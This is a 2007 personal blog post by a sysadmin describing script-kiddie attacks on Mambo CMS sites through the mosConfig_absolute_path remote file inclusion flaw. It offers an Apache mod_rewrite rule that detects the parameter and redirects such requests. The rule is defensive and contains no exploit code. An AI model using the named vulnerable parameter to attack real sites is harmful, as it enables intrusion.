ronny.haryan.to

Icon

Print: $9.50 — Online: free

Jul 9, 2007

Mambo mod_rewrite Security Hack

At work I manage several servers that are mainly used to serve websites built using the Mambo content management system. Personally I don’t follow the development of Mambo, but I know that it had/has several security vulnerabilities. One of them was pretty easy to exploit. To make matter worse, Mambo has a distinct URL structure that makes it really easy to find Mambo sites using search engines. This combination attracts a lot of script kiddies from all over the world. I’ve seen several successful attempts of these idiots putting IRC DCC bots and spamming activities coming from Nigeria, Brazil, Indonesia (Jogja), Russia, Italy, etc.

Sometimes the problem is not from Mambo itself, but from poorly written third-party components that don’t give any shit about security (why don’t you write a big “hack me” sign on the front page while you’re chmod 777-ing all your files?). But as far as I know, Mambo doesn’t seem to have any built-in protection from poorly written third-party components. I’m by no means a Mambo expert, so I could be wrong. And please do correct me if I’m wrong.

I’ve had enough of these kiddie idiots running around thinking they’re cool hackers. The thing is I don’t have time to investigate why Mambo or its third-party components that were installed was broken. Luckily, there is a pattern in all of the incidents: they all exploit mosConfig_absolute_path remote script execution (thanks to PHP’s ability to include()/require() files over HTTP). In many cases I could disable allow_url_include and/or allow_url_fopen in php.ini, but in certain cases it’s needed, so I couldn’t disable it. So I wrote a quick fix using Apache’s mod_rewrite and put it in a .htaccess file:

RewriteEngine On
RewriteCond %{QUERY_STRING} mosConfig_absolute_path= [NC]
RewriteRule ^.*$ http://%{SERVER_NAME}/? [R]

This will redirect all exploit attempts to the front page, so adjust to your environment. You can change mosConfig_absolute_path= to just mosConfig if you want to be really anal. As I said, I’m not a Mambo expert, so I don’t know if something like this can or should be included in the default .htaccess that comes with Mambo. People more familiar with Mambo can figure that out. In the meantime, this small hack should deter the kiddies.

Category: Security, Tips

Tagged:

Comments are closed.

About

Ronny Haryanto is a technology addict/chef wannabe living in beautiful Melbourne, Australia.

Read more…

Follow Me on Twitter

Follow @ronny on Twitter where I post much more often than my blog.